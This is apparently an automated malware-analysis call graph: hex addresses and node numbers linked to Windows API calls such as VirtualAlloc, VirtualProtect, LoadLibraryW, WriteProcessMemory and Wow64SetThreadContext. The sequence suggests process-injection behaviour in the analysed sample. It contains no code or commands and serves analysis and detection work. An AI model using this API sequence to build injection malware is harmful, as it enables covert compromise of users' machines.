7f1b75 27783->28993 29007 7c8375 27783->29007 29015 7de175 27783->29015 29019 7b2373 27783->29019 29031 7c8678 27783->29031 29035 7c8c27 27783->29035 29039 7c892b 27783->29039 29043 7aba85 27783->29043 29055 7ac586 27783->29055 29059 7ab586 27783->29059 29069 7c8880 27783->29069 29073 7b27b5 27783->29073 29082 7aa681 27783->29082 29104 7ab881 27783->29104 29114 7ac580 27783->29114 29118 7ac482 27783->29118 29122 7ac08c 27783->29122 29130 7d1788 27783->29130 29134 7c858e 27783->29134 29138 80f671 27783->29138 29144 7ab795 27783->29144 29154 7aa995 27783->29154 29170 7ef990 27783->29170 29197 7ab696 27783->29197 29207 7a7496 27783->29207 29229 7f1394 27783->29229 29251 7c8b95 27783->29251 29255 7aae92 27783->29255 29271 7fa39a 27783->29271 29275 7aae9f 27783->29275 29291 7ab4a4 27783->29291 29307 7c81a0 27783->29307 29315 7b26a0 27783->29315 29326 7ac4a1 27783->29326 29330 7ab0a0 27783->29330 29346 7abcaf 27783->29346 29359 7aa8af 27783->29359 29379 7c8ca9 27783->29379 29382 7a57ae 27783->29382 29386 7b27a9 27783->29386 29397 7ab4ab 27783->29397 29412 7a53ab 27783->29412 29422 7c82b3 27783->29422 29430 7bd030 27783->29430 29435 7ac037 27783->29435 29445 7f16b2 27783->29445 29465 7c8cb0 27783->29465 29468 7c8cb7 27783->29468 29471 7bd1b3 27783->29471 29474 7c80bb 27783->29474 29478 7c89ba 27783->29478 29482 7ab6b9 27783->29482 29492 7c88bf 27783->29492 29500 7b24b9 27783->29500 29511 7aa5c7 27783->29511 29533 7ac2c7 27783->29533 29537 7abcc6 27783->29537 29549 7f19c3 27783->29549 29567 7f1bc4 27783->29567 29570 7a5386 27783->29570 29580 7a51b5 27783->29580 29584 7abdcd 27783->29584 29596 7a51cf 27783->29596 29600 7a59c9 27783->29600 29604 7a74c8 27783->29604 29626 7c85cd 27783->29626 29630 7aa9ca 27783->29630 29647 7aa6c0 27783->29647 29673 7b28d5 VirtualProtect 27783->29673 29680 7ac3d6 27783->29680 29684 7fa3d4 27783->29684 29688 7b24d3 27783->29688 29703 7c83db 27783->29703 27974 7b22fa 27973->27974 27983 7b22eb 27973->27983 27976 7b231a 11 API calls 27974->27976 27975 7b25c5 VirtualProtect 27980 7b294d VirtualProtect 27975->27980 27981 7b2907 27975->27981 27977 7b2310 27976->27977 29712 7b23f8 27977->29712 27986 7b29f8 27980->27986 29715 7b2923 VirtualProtect 27981->29715 27983->27975 27987 7b2756 5 API calls 27983->27987 27987->27975 27989 802734 VirtualProtect 27988->27989 27991 80fdf4 27989->27991 27991->27783 27993 7aa6ed 27992->27993 27996 7aa6fc 27992->27996 27994 7aa96f 12 API calls 27993->27994 27995 7aa965 27994->27995 28002 7aa982 VirtualAlloc 27995->28002 29717 7aa9df 10 API calls 27995->29717 27997 7aa8df 27996->27997 27998 7aa89f 27996->27998 29716 7aa8f1 16 API calls 27997->29716 28000 7aa8af 14 API calls 27998->28000 28000->27993 28004 7ab53a 28002->28004 28007 7ab55f 28002->28007 28005 7ab54b 8 API calls 28004->28005 28006 7ab540 28005->28006 28008 7ab568 7 API calls 28006->28008 28009 7ab909 28007->28009 28012 7ac1d6 28007->28012 28008->28007 29718 7ab9b3 6 API calls 28009->29718 28015 7ac896 VirtualFree 28012->28015 28016 7ac8ba 28015->28016 28016->27783 28018 80f533 28017->28018 28019 80f671 2 API calls 28018->28019 28020 80f667 28018->28020 28019->28020 28021 80fdd3 VirtualProtect 28020->28021 28022 80fdf4 28021->28022 28022->27783 28024 7ac88a VirtualFree 28023->28024 28026 7ac8ba 28024->28026 28026->27783 28028 7ab489 VirtualAlloc 28027->28028 28030 7ab53a 28028->28030 28033 7ab55f 28028->28033 28031 7ab54b 8 API calls 28030->28031 28032 7ab540 28031->28032 28034 7ab568 7 API calls 28032->28034 28035 7ab909 28033->28035 28040 7ac1d6 28033->28040 28034->28033 29719 7ab9b3 6 API calls 28035->29719 28041 7ac896 VirtualFree 28040->28041 28042 7ac8ba 28041->28042 28042->27783 28044 7fa3ec VirtualProtect 28043->28044 28045 7fa3f5 28043->28045 28046 7fa42c 28044->28046 28045->28044 28049 7ac2e2 28047->28049 28048 7ac896 VirtualFree 28050 7ac8ba 28048->28050 28049->28048 28050->27783 28052 7a57e9 28051->28052 28053 7a5d9d VirtualProtect 28052->28053 28054 7a5dfc 28053->28054 28059 7abdef 28055->28059 28056 7ac108 28057 7ac117 2 API calls 28056->28057 28058 7ac10e 28057->28058 28060 7ac02a 4 API calls 28059->28060 28061 7abe24 28059->28061 28060->28061 28061->28056 28062 7ac1d6 28061->28062 28063 7ac896 VirtualFree 28062->28063 28064 7ac8ba 28063->28064 28064->27783 28066 7fa3c1 28065->28066 28067 7fa3ec VirtualProtect 28066->28067 28068 7fa42c 28067->28068 28070 7a5d91 VirtualProtect 28069->28070 28072 7a5dfc 28070->28072 28074 7a7770 LoadLibraryW 28073->28074 28076 7a7799 LoadLibraryW 28074->28076 28077 7a77b6 28074->28077 28076->28077 28080 7a8488 28077->28080 28082 7a7bbb 28077->28082 28078 7a913d 29721 7a91f1 22 API calls 28078->29721 28080->28078 28091 7a9a0a 28080->28091 29720 7a8055 22 API calls 28082->29720 28087 7a804b 28092 7aadd5 28091->28092 28093 7aa5c7 22 API calls 28091->28093 28092->27783 28094 7aa5bd 28093->28094 28096 7a56f3 28095->28096 28097 7a5d9d VirtualProtect 28096->28097 28098 7a5dfc 28097->28098 28100 7ac2f0 28099->28100 28101 7ac896 VirtualFree 28100->28101 28102 7ac8ba 28101->28102 28102->27783 28107 7abdef 28103->28107 28104 7ac108 28105 7ac117 2 API calls 28104->28105 28106 7ac10e 28105->28106 28108 7ac02a 4 API calls 28107->28108 28109 7abe24 28107->28109 28108->28109 28109->28104 28110 7ac1d6 28109->28110 28111 7ac896 VirtualFree 28110->28111 28112 7ac8ba 28111->28112 28112->27783 28114 7c8c94 VirtualProtect 28113->28114 28116 7c8cff 28114->28116 28118 7a56fd 28117->28118 28119 7a5d9d VirtualProtect 28118->28119 28120 7a5dfc 28119->28120 28122 7bd10c VirtualProtect 28121->28122 28124 7bd1ed 28122->28124 28126 7eef04 WriteProcessMemory 28125->28126 28132 7eef45 28125->28132 28143 7efabe 28126->28143 28147 7efab9 28126->28147 28128 7ef365 29722 7ef3f1 10 API calls 28128->29722 28131 7efed9 28133 7efefe 28131->28133 28134 7f080b 28131->28134 28132->28128 28137 7ef36f 9 API calls 28132->28137 29726 7effad 8 API calls 28133->29726 29727 7f0823 8 API calls 28134->29727 28137->28128 28140 7effa6 28149 7efbf4 28143->28149 28153 7efd93 28143->28153 29723 7efcca 8 API calls 28143->29723 28149->28131 29725 7efed3 8 API calls 28149->29725 28153->28149 29724 7efc6b 8 API calls 28153->29724 28159 7abb09 28156->28159 28157 7ac896 VirtualFree 28160 7ac8ba 28157->28160 28158 7abde3 5 API calls 28164 7abddb 28158->28164 28159->28158 28167 7abd83 28159->28167 28160->27783 28161 7ac108 28162 7ac117 2 API calls 28161->28162 28163 7ac10e 28162->28163 28165 7ac02a 4 API calls 28164->28165 28166 7abe24 28164->28166 28165->28166 28166->28161 28166->28167 28167->28157 28171 7abf0e 28168->28171 28169 7ac021 28170 7ac108 28169->28170 28175 7ac1d6 28169->28175 28172 7ac117 2 API calls 28170->28172 28171->28169 28173 7ac02a 4 API calls 28171->28173 28174 7ac10e 28172->28174 28173->28169 28176 7ac896 VirtualFree 28175->28176 28177 7ac8ba 28176->28177 28177->27783 28179 7ac207 28178->28179 28180 7ac896 VirtualFree 28179->28180 28181 7ac8ba 28180->28181 28181->27783 28183 7ab614 28182->28183 28184 7ab909 28183->28184 28189 7ac1d6 28183->28189 29728 7ab9b3 6 API calls 28184->29728 28190 7ac896 VirtualFree 28189->28190 28191 7ac8ba 28190->28191 28191->27783 28196 7abb09 28192->28196 28193 7ac896 VirtualFree 28195 7ac8ba 28193->28195 28194 7abde3 5 API calls 28200 7abddb 28194->28200 28195->27783 28196->28194 28203 7abd83 28196->28203 28197 7ac108 28198 7ac117 2 API calls 28197->28198 28199 7ac10e 28198->28199 28201 7ac02a 4 API calls 28200->28201 28202 7abe24 28200->28202 28201->28202 28202->28197 28202->28203 28203->28193 28205 7ac30b 28204->28205 28206 7ac896 VirtualFree 28205->28206 28207 7ac8ba 28206->28207 28207->27783 28209 7c84da 28208->28209 28210 7c84e7 28209->28210 28213 7c85b5 28209->28213 28211 7c8553 2 API calls 28210->28211 28212 7c854b 28211->28212 28214 7c8cbd VirtualProtect 28213->28214 28215 7c8cff 28214->28215 28217 7aa8a5 28216->28217 28220 7aa708 28216->28220 28218 7aa96f 12 API calls 28217->28218 28219 7aa965 28218->28219 28226 7aa982 VirtualAlloc 28219->28226 29730 7aa9df 10 API calls 28219->29730 28220->28217 28221 7aa8df 28220->28221 28222 7aa89f 28220->28222 29729 7aa8f1 16 API calls 28221->29729 28224 7aa8af 14 API calls 28222->28224 28224->28217 28228 7ab53a 28226->28228 28231 7ab55f 28226->28231 28229 7ab54b 8 API calls 28228->28229 28230 7ab540 28229->28230 28232 7ab568 7 API calls 28230->28232 28233 7ab909 28231->28233 28238 7ac1d6 28231->28238 28232->28231 29731 7ab9b3 6 API calls 28233->29731 28239 7ac896 VirtualFree 28238->28239 28240 7ac8ba 28239->28240 28240->27783 28243 7c8035 28241->28243 28242 7c8094 28243->28242 28244 7c8cbd VirtualProtect 28243->28244 28245 7c8cff 28244->28245 28247 7ac88a VirtualFree 28246->28247 28249 7ac8ba 28247->28249 28249->27783 28251 7ab489 VirtualAlloc 28250->28251 28253 7ab53a 28251->28253 28256 7ab55f 28251->28256 28254 7ab54b 8 API calls 28253->28254 28255 7ab540 28254->28255 28257 7ab568 7 API calls 28255->28257 28258 7ab909 28256->28258 28263 7ac1d6 28256->28263 28257->28256 29732 7ab9b3 6 API calls 28258->29732 28264 7ac896 VirtualFree 28263->28264 28265 7ac8ba 28264->28265 28265->27783 28267 7bd10c VirtualProtect 28266->28267 28269 7bd1ed 28267->28269 28271 7abf6c 28270->28271 28272 7ac02a 4 API calls 28271->28272 28273 7ac021 28272->28273 28274 7ac108 28273->28274 28277 7ac1d6 28273->28277 28275 7ac117 2 API calls 28274->28275 28276 7ac10e 28275->28276 28278 7ac896 VirtualFree 28277->28278 28279 7ac8ba 28278->28279 28279->27783 28281 7a5977 28280->28281 28282 7a5d9d VirtualProtect 28281->28282 28283 7a5dfc 28282->28283 28285 7ab718 28284->28285 28286 7ab909 28285->28286 28291 7ac1d6 28285->28291 29733 7ab9b3 6 API calls 28286->29733 28292 7ac896 VirtualFree 28291->28292 28293 7ac8ba 28292->28293 28293->27783 28295 7c8a6d VirtualProtect 28294->28295 28297 7c8cff 28295->28297 28299 7a5d91 VirtualProtect 28298->28299 28301 7a5dfc 28299->28301 28303 7ac12a VirtualFree 28302->28303 28306 7ac11f 28303->28306 28304 7ac896 VirtualFree 28305 7ac8ba 28304->28305 28305->27783 28306->28304 28308 7c8c94 VirtualProtect 28307->28308 28310 7c8cff 28308->28310 28312 7fa03d 28311->28312 28313 7fa3ec VirtualProtect 28312->28313 28314 7fa42c 28313->28314 28317 7bd01f 28315->28317 28316 7bd08a 28317->28316 28318 7bd1bf VirtualProtect 28317->28318 28319 7bd1ed 28318->28319 28322 7b241f 28320->28322 28321 7b2310 28324 7b23f8 9 API calls 28321->28324 28322->28321 28325 7b2306 28322->28325 29734 7b24a1 7 API calls 28322->29734 28333 7b23f1 28324->28333 28326 7b231a 9 API calls 28325->28326 28325->28333 28326->28321 28328 7b294d VirtualProtect 28335 7b29f8 28328->28335 28329 7b2907 29735 7b2923 VirtualProtect 28329->29735 28334 7b2756 5 API calls 28333->28334 28336 7b25c5 VirtualProtect 28333->28336 28334->28336 28336->28328 28336->28329 28338 7ac313 28337->28338 28339 7ac896 VirtualFree 28338->28339 28340 7ac8ba 28339->28340 28340->27783 28342 7bd122 VirtualProtect 28341->28342 28344 7bd1ed 28342->28344 28346 7fa3c1 28345->28346 28347 7fa3ec VirtualProtect 28346->28347 28348 7fa42c 28347->28348 28352 80efc6 28349->28352 28350 80f255 VirtualProtect 28354 80fdf4 28350->28354 28352->28349 28352->28350 28353 80f2be 4 API calls 28352->28353 28353->28350 28354->27783 28356 7b235f 28355->28356 28357 7b23f8 9 API calls 28356->28357 28363 7b23f1 28357->28363 28358 7b25c5 VirtualProtect 28360 7b294d VirtualProtect 28358->28360 28361 7b2907 28358->28361 28366 7b29f8 28360->28366 29736 7b2923 VirtualProtect 28361->29736 28363->28358 28367 7b2756 5 API calls 28363->28367 28367->28358 28369 7a6c2d LoadLibraryW 28368->28369 28371 7a7799 LoadLibraryW 28369->28371 28372 7a77b6 28369->28372 28371->28372 28375 7a8488 28372->28375 28377 7a7bbb 28372->28377 28373 7a913d 29738 7a91f1 22 API calls 28373->29738 28375->28373 28386 7a9a0a 28375->28386 29737 7a8055 22 API calls 28377->29737 28382 7a804b 28387 7aadd5 28386->28387 28388 7aa5c7 22 API calls 28386->28388 28387->27783 28389 7aa5bd 28388->28389 28392 7a5130 28390->28392 28391 7a5011 28392->28391 28393 7a5d9d VirtualProtect 28392->28393 28394 7a5dfc 28393->28394 28396 7a5603 28395->28396 28397 7a5610 28396->28397 28402 7a56de 28396->28402 29739 7a5625 VirtualProtect 28397->29739 28403 7a5d9d VirtualProtect 28402->28403 28404 7a5dfc 28403->28404 28407 7bd028 28405->28407 28406 7bd08a 28407->28406 28408 7bd1bf VirtualProtect 28407->28408 28409 7bd1ed 28408->28409 28411 7ab6e7 28410->28411 28412 7ab909 28411->28412 28417 7ac1d6 28411->28417 29740 7ab9b3 6 API calls 28412->29740 28418 7ac896 VirtualFree 28417->28418 28419 7ac8ba 28418->28419 28419->27783 28421 7a744e LoadLibraryW 28420->28421 28423 7a7799 LoadLibraryW 28421->28423 28424 7a77b6 28421->28424 28423->28424 28427 7a8488 28424->28427 28429 7a7bbb 28424->28429 28425 7a913d 29742 7a91f1 22 API calls 28425->29742 28427->28425 28438 7a9a0a 28427->28438 29741 7a8055 22 API calls 28429->29741 28434 7a804b 28439 7aadd5 28438->28439 28440 7aa5c7 22 API calls 28438->28440 28439->27783 28441 7aa5bd 28440->28441 28443 7a5603 28442->28443 28444 7a5610 28443->28444 28449 7a56de 28443->28449 29743 7a5625 VirtualProtect 28444->29743 28450 7a5d9d VirtualProtect 28449->28450 28451 7a5dfc 28450->28451 28453 7ab834 28452->28453 28454 7ab909 28453->28454 28459 7ac1d6 28453->28459 29744 7ab9b3 6 API calls 28454->29744 28460 7ac896 VirtualFree 28459->28460 28461 7ac8ba 28460->28461 28461->27783 28463 7c803f 28462->28463 28464 7c8094 28463->28464 28465 7c8cbd VirtualProtect 28463->28465 28466 7c8cff 28465->28466 28468 7ac33e 28467->28468 28469 7ac896 VirtualFree 28468->28469 28470 7ac8ba 28469->28470 28470->27783 28472 7ac54a VirtualFree 28471->28472 28474 7ac8ba 28472->28474 28474->27783 28478 7ac14d 28475->28478 28476 7ac896 VirtualFree 28477 7ac8ba 28476->28477 28477->27783 28478->28476 28480 7ac038 28479->28480 28481 7ac08c 3 API calls 28480->28481 28482 7ac05e 28480->28482 28481->28480 28483 7ac108 28482->28483 28486 7ac1d6 28482->28486 28484 7ac117 2 API calls 28483->28484 28485 7ac10e 28484->28485 28487 7ac896 VirtualFree 28486->28487 28488 7ac8ba 28487->28488 28488->27783 28492 7b294d VirtualProtect 28489->28492 28491 7b29f8 28492->28491 28494 7c84da 28493->28494 28495 7c84e7 28494->28495 28498 7c85b5 28494->28498 28496 7c8553 2 API calls 28495->28496 28497 7c854b 28496->28497 28499 7c8cbd VirtualProtect 28498->28499 28500 7c8cff 28499->28500 28502 7b28a8 VirtualProtect 28501->28502 28504 7b2907 28502->28504 28506 7b294d VirtualProtect 28502->28506 29745 7b2923 VirtualProtect 28504->29745 28509 7b29f8 28506->28509 28511 7ab495 VirtualAlloc 28510->28511 28513 7ab53a 28511->28513 28516 7ab55f 28511->28516 28514 7ab54b 8 API calls 28513->28514 28515 7ab540 28514->28515 28517 7ab568 7 API calls 28515->28517 28518 7ab909 28516->28518 28523 7ac1d6 28516->28523 28517->28516 29746 7ab9b3 6 API calls 28518->29746 28524 7ac896 VirtualFree 28523->28524 28525 7ac8ba 28524->28525 28525->27783 28527 7ab489 VirtualAlloc 28526->28527 28529 7ab53a 28527->28529 28532 7ab55f 28527->28532 28530 7ab54b 8 API calls 28529->28530 28531 7ab540 28530->28531 28533 7ab568 7 API calls 28531->28533 28534 7ab909 28532->28534 28539 7ac1d6 28532->28539 28533->28532 29747 7ab9b3 6 API calls 28534->29747 28540 7ac896 VirtualFree 28539->28540 28541 7ac8ba 28540->28541 28541->27783 28543 7b2836 VirtualProtect 28542->28543 28545 7b2907 28543->28545 28549 7b294d VirtualProtect 28543->28549 29748 7b2923 VirtualProtect 28545->29748 28550 7b29f8 28549->28550 28552 7ac88a VirtualFree 28551->28552 28554 7ac8ba 28552->28554 28554->27783 28558 7ef74e 28555->28558 28559 7ef990 9 API calls 28558->28559 28565 7ef774 WriteProcessMemory 28558->28565 28559->28565 28560 7efed9 28561 7efefe 28560->28561 28562 7f080b 28560->28562 29752 7effad 8 API calls 28561->29752 29753 7f0823 8 API calls 28562->29753 28566 7efab9 28565->28566 28572 7efabe 28565->28572 28569 7effa6 28578 7efd93 28572->28578 28581 7efbf4 28572->28581 29749 7efcca 8 API calls 28572->29749 28578->28581 29750 7efc6b 8 API calls 28578->29750 28581->28560 29751 7efed3 8 API calls 28581->29751 28585 7a5d91 VirtualProtect 28584->28585 28587 7a5dfc 28585->28587 28589 7fa3c1 28588->28589 28590 7fa3ec VirtualProtect 28589->28590 28591 7fa42c 28590->28591 28596 80f2f6 28592->28596 28598 80f307 28592->28598 28593 80f671 2 API calls 28594 80f667 28593->28594 28597 80fdd3 VirtualProtect 28594->28597 28595 80f521 3 API calls 28595->28596 28596->28593 28596->28594 28599 80fdf4 28597->28599 28598->28595 28598->28596 28599->27783 28601 7ac54a VirtualFree 28600->28601 28603 7ac8ba 28601->28603 28603->27783 28605 7f176d Wow64SetThreadContext 28604->28605 28620 7f17ae 28604->28620 28621 7f2318 28605->28621 28606 7f1beb 29754 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 28606->29754 28609 7f1b75 4 API calls 28610 7f1b6b 28609->28610 28610->28606 28611 7f1baa 28610->28611 28615 7f1bc4 Wow64SetThreadContext 28611->28615 28614 7f180e 28614->28606 28614->28609 28615->28605 28617 7f19c3 5 API calls 28617->28620 28620->28614 28620->28617 28623 7aae56 28622->28623 28624 7ab4c6 VirtualAlloc 28623->28624 28625 7ab53a 28624->28625 28628 7ab55f 28624->28628 28626 7ab54b 8 API calls 28625->28626 28627 7ab540 28626->28627 28629 7ab568 7 API calls 28627->28629 28630 7ab909 28628->28630 28635 7ac1d6 28628->28635 28629->28628 29755 7ab9b3 6 API calls 28630->29755 28636 7ac896 VirtualFree 28635->28636 28637 7ac8ba 28636->28637 28637->27783 28639 7c8a6d VirtualProtect 28638->28639 28641 7c8cff 28639->28641 28643 7ab8ca 28642->28643 28644 7ab909 28643->28644 28649 7ac1d6 28643->28649 29756 7ab9b3 6 API calls 28644->29756 28650 7ac896 VirtualFree 28649->28650 28651 7ac8ba 28650->28651 28651->27783 28653 7c8972 VirtualProtect 28652->28653 28655 7c8cff 28653->28655 28659 7ac155 28656->28659 28657 7ac896 VirtualFree 28658 7ac8ba 28657->28658 28658->27783 28659->28657 28663 7ac155 28660->28663 28661 7ac896 VirtualFree 28662 7ac8ba 28661->28662 28662->27783 28663->28661 28665 7a7770 LoadLibraryW 28664->28665 28667 7a7799 LoadLibraryW 28665->28667 28668 7a77b6 28665->28668 28667->28668 28671 7a8488 28668->28671 28673 7a7bbb 28668->28673 28669 7a913d 29758 7a91f1 22 API calls 28669->29758 28671->28669 28682 7a9a0a 28671->28682 29757 7a8055 22 API calls 28673->29757 28678 7a804b 28683 7aadd5 28682->28683 28684 7aa5c7 22 API calls 28682->28684 28683->27783 28685 7aa5bd 28684->28685 28687 7ab568 7 API calls 28686->28687 28688 7ab55f 28686->28688 28687->28688 28689 7ab909 28688->28689 28694 7ac1d6 28688->28694 29759 7ab9b3 6 API calls 28689->29759 28695 7ac896 VirtualFree 28694->28695 28696 7ac8ba 28695->28696 28696->27783 28698 7c8570 28697->28698 28699 7c858e VirtualProtect 28698->28699 28702 7c8586 28698->28702 28699->28702 28700 7c8cbd VirtualProtect 28701 7c8cff 28700->28701 28702->28700 28704 7a596b 28703->28704 28705 7a5d9d VirtualProtect 28704->28705 28706 7a5dfc 28705->28706 28708 7a5603 28707->28708 28709 7a5610 28708->28709 28714 7a56de 28708->28714 29760 7a5625 VirtualProtect 28709->29760 28715 7a5d9d VirtualProtect 28714->28715 28716 7a5dfc 28715->28716 28718 7b2767 3 API calls 28717->28718 28719 7b270d 28718->28719 28720 7b2756 3 API calls 28719->28720 28721 7b274b VirtualProtect 28719->28721 28720->28721 28723 7b294d VirtualProtect 28721->28723 28724 7b2907 28721->28724 28728 7b29f8 28723->28728 29761 7b2923 VirtualProtect 28724->29761 28730 7a777c LoadLibraryW 28729->28730 28732 7a6c19 28729->28732 28731 7a7799 LoadLibraryW 28730->28731 28733 7a77b6 28730->28733 28731->28733 28732->28730 28734 7a8488 28733->28734 28738 7a7bbb 28733->28738 28735 7a913d 28734->28735 28747 7a9a0a 28734->28747 29763 7a91f1 22 API calls 28735->29763 29762 7a8055 22 API calls 28738->29762 28743 7a804b 28748 7aadd5 28747->28748 28749 7aa5c7 22 API calls 28747->28749 28748->27783 28750 7aa5bd 28749->28750 28752 7c84da 28751->28752 28753 7c84e7 28752->28753 28756 7c85b5 28752->28756 28754 7c8553 2 API calls 28753->28754 28755 7c854b 28754->28755 28757 7c8cbd VirtualProtect 28756->28757 28758 7c8cff 28757->28758 28760 7a5257 VirtualProtect 28759->28760 28762 7a5dfc 28760->28762 28764 7ab664 28763->28764 28765 7ab909 28764->28765 28770 7ac1d6 28764->28770 29764 7ab9b3 6 API calls 28765->29764 28771 7ac896 VirtualFree 28770->28771 28772 7ac8ba 28771->28772 28772->27783 28774 80fdd3 VirtualProtect 28773->28774 28775 80fdf4 28774->28775 28775->27783 28777 7ac261 VirtualFree 28776->28777 28779 7ac8ba 28777->28779 28779->27783 28783 7a5699 28780->28783 28781 7a5d9d VirtualProtect 28782 7a5dfc 28781->28782 28783->28781 28785 7f22a1 Wow64SetThreadContext 28784->28785 28787 7f2318 28785->28787 28790 7f1f7c 28788->28790 28791 7f225c Wow64SetThreadContext 28790->28791 28792 7f1fdd Wow64SetThreadContext 28790->28792 28791->28792 28793 7f2318 28792->28793 28795 7ac56c VirtualFree 28794->28795 28797 7ac8ba 28795->28797 28797->27783 28801 7ab68b 28798->28801 28799 7ab909 29765 7ab9b3 6 API calls 28799->29765 28801->28799 28803 7ac1d6 28801->28803 28806 7ac896 VirtualFree 28803->28806 28807 7ac8ba 28806->28807 28807->27783 28809 7b270d 28808->28809 28810 7b2756 3 API calls 28809->28810 28811 7b274b VirtualProtect 28809->28811 28810->28811 28813 7b294d VirtualProtect 28811->28813 28814 7b2907 28811->28814 28818 7b29f8 28813->28818 29766 7b2923 VirtualProtect 28814->29766 28820 7a777c LoadLibraryW 28819->28820 28821 7a7799 LoadLibraryW 28820->28821 28822 7a77b6 28820->28822 28821->28822 28825 7a8488 28822->28825 28827 7a7bbb 28822->28827 28823 7a913d 29768 7a91f1 22 API calls 28823->29768 28825->28823 28836 7a9a0a 28825->28836 29767 7a8055 22 API calls 28827->29767 28832 7a804b 28837 7aadd5 28836->28837 28838 7aa5c7 22 API calls 28836->28838 28837->27783 28839 7aa5bd 28838->28839 28841 7abd83 28840->28841 28842 7abdc4 28840->28842 28843 7ac896 VirtualFree 28841->28843 28844 7abde3 5 API calls 28842->28844 28845 7ac8ba 28843->28845 28849 7abddb 28844->28849 28845->27783 28846 7ac108 28847 7ac117 2 API calls 28846->28847 28848 7ac10e 28847->28848 28850 7ac02a 4 API calls 28849->28850 28851 7abe24 28849->28851 28850->28851 28851->28841 28851->28846 28853 7c806b VirtualProtect 28852->28853 28855 7c8cff 28853->28855 28857 7ab489 VirtualAlloc 28856->28857 28859 7ab53a 28857->28859 28862 7ab55f 28857->28862 28860 7ab54b 8 API calls 28859->28860 28861 7ab540 28860->28861 28863 7ab568 7 API calls 28861->28863 28864 7ab909 28862->28864 28869 7ac1d6 28862->28869 28863->28862 29769 7ab9b3 6 API calls 28864->29769 28870 7ac896 VirtualFree 28869->28870 28871 7ac8ba 28870->28871 28871->27783 28873 7aa9c3 28872->28873 28875 7aa982 VirtualAlloc 28872->28875 29770 7aa9df 10 API calls 28873->29770 28877 7ab53a 28875->28877 28880 7ab55f 28875->28880 28878 7ab54b 8 API calls 28877->28878 28879 7ab540 28878->28879 28881 7ab568 7 API calls 28879->28881 28882 7ab909 28880->28882 28887 7ac1d6 28880->28887 28881->28880 29771 7ab9b3 6 API calls 28882->29771 28888 7ac896 VirtualFree 28887->28888 28889 7ac8ba 28888->28889 28889->27783 28894 7c82b3 28890->28894 28891 7c84e7 28892 7c8553 2 API calls 28891->28892 28893 7c854b 28892->28893 28894->28891 28895 7c85b5 28894->28895 28896 7c8cbd VirtualProtect 28895->28896 28897 7c8cff 28896->28897 28899 7b229e 28898->28899 28907 7b228f 28898->28907 28900 7b22de 13 API calls 28899->28900 28900->28907 28902 7b294d VirtualProtect 28909 7b29f8 28902->28909 28903 7b2907 29772 7b2923 VirtualProtect 28903->29772 28908 7b2756 5 API calls 28907->28908 28910 7b25c5 VirtualProtect 28907->28910 28908->28910 28910->28902 28910->28903 28912 7ab580 28911->28912 28913 7ab909 28912->28913 28918 7ac1d6 28912->28918 29773 7ab9b3 6 API calls 28913->29773 28919 7ac896 VirtualFree 28918->28919 28920 7ac8ba 28919->28920 28920->27783 28922 7ac88a VirtualFree 28921->28922 28924 7ac8ba 28922->28924 28924->27783 28926 7efa82 WriteProcessMemory 28925->28926 28935 7efab9 28926->28935 28939 7efabe 28926->28939 28928 7efed9 28929 7efefe 28928->28929 28930 7f080b 28928->28930 29777 7effad 8 API calls 28929->29777 29778 7f0823 8 API calls 28930->29778 28936 7effa6 28942 7efd93 28939->28942 28947 7efbf4 28939->28947 29774 7efcca 8 API calls 28939->29774 28942->28947 29775 7efc6b 8 API calls 28942->29775 28947->28928 29776 7efed3 8 API calls 28947->29776 28952 7c8a91 28951->28952 28952->28951 28953 7c8cbd VirtualProtect 28952->28953 28954 7c8cff 28953->28954 28956 7c8972 VirtualProtect 28955->28956 28958 7c8cff 28956->28958 28965 7ab68b 28959->28965 28960 7ab909 29779 7ab9b3 6 API calls 28960->29779 28965->28960 28966 7ac1d6 28965->28966 28967 7ac896 VirtualFree 28966->28967 28968 7ac8ba 28967->28968 28968->27783 28970 7c82b3 28969->28970 28971 7c84e7 28970->28971 28974 7c85b5 28970->28974 28972 7c8553 2 API calls 28971->28972 28973 7c854b 28972->28973 28975 7c8cbd VirtualProtect 28974->28975 28976 7c8cff 28975->28976 28978 7a5d91 VirtualProtect 28977->28978 28980 7a5dfc 28978->28980 28982 7de232 28981->28982 28983 7de81a VirtualProtect 28982->28983 28984 7de847 28983->28984 28986 7bd182 VirtualProtect 28985->28986 28988 7bd1ed 28986->28988 28992 7ac177 28989->28992 28990 7ac896 VirtualFree 28991 7ac8ba 28990->28991 28991->27783 28992->28990 28994 7f1ba6 28993->28994 28995 7f1beb 28994->28995 28996 7f1baa 28994->28996 29780 7f1c53 Wow64SetThreadContext Wow64SetThreadContext 28995->29780 28998 7f1bc4 Wow64SetThreadContext 28996->28998 28999 7f1bbd Wow64SetThreadContext 28998->28999 29006 7f2318 28999->29006 29008 7c82b3 29007->29008 29009 7c84e7 29008->29009 29012 7c85b5 29008->29012 29010 7c8553 2 API calls 29009->29010 29011 7c854b 29010->29011 29013 7c8cbd VirtualProtect 29012->29013 29014 7c8cff 29013->29014 29016 7de182 29015->29016 29017 7de81a VirtualProtect 29016->29017 29018 7de847 29017->29018 29020 7b23f8 11 API calls 29019->29020 29027 7b23f1 29019->29027 29020->29027 29022 7b294d VirtualProtect 29029 7b29f8 29022->29029 29023 7b2907 29781 7b2923 VirtualProtect 29023->29781 29028 7b2756 5 API calls 29027->29028 29030 7b25c5 VirtualProtect 29027->29030 29028->29030 29030->29022 29030->29023 29032 7c86a6 VirtualProtect 29031->29032 29034 7c8cff 29032->29034 29037 7c8a6d VirtualProtect 29035->29037 29038 7c8cff 29037->29038 29040 7c8931 VirtualProtect 29039->29040 29042 7c8cff 29040->29042 29046 7aba92 29043->29046 29044 7ac896 VirtualFree 29047 7ac8ba 29044->29047 29045 7abde3 5 API calls 29051 7abddb 29045->29051 29046->29045 29054 7abd83 29046->29054 29047->27783 29048 7ac108 29049 7ac117 2 API calls 29048->29049 29050 7ac10e 29049->29050 29052 7ac02a 4 API calls 29051->29052 29053 7abe24 29051->29053 29052->29053 29053->29048 29053->29054 29054->29044 29056 7ac58d VirtualFree 29055->29056 29058 7ac8ba 29056->29058 29058->27783 29060 7ab587 29059->29060 29061 7ab909 29060->29061 29066 7ac1d6 29060->29066 29782 7ab9b3 6 API calls 29061->29782 29067 7ac896 VirtualFree 29066->29067 29068 7ac8ba 29067->29068 29068->27783 29070 7c8900 VirtualProtect 29069->29070 29072 7c8cff 29070->29072 29074 7b27ff VirtualProtect 29073->29074 29076 7b294d VirtualProtect 29074->29076 29077 7b2907 29074->29077 29081 7b29f8 29076->29081 29783 7b2923 VirtualProtect 29077->29783 29083 7aa687 29082->29083 29084 7aa691 29083->29084 29085 7aa6c0 20 API calls 29083->29085 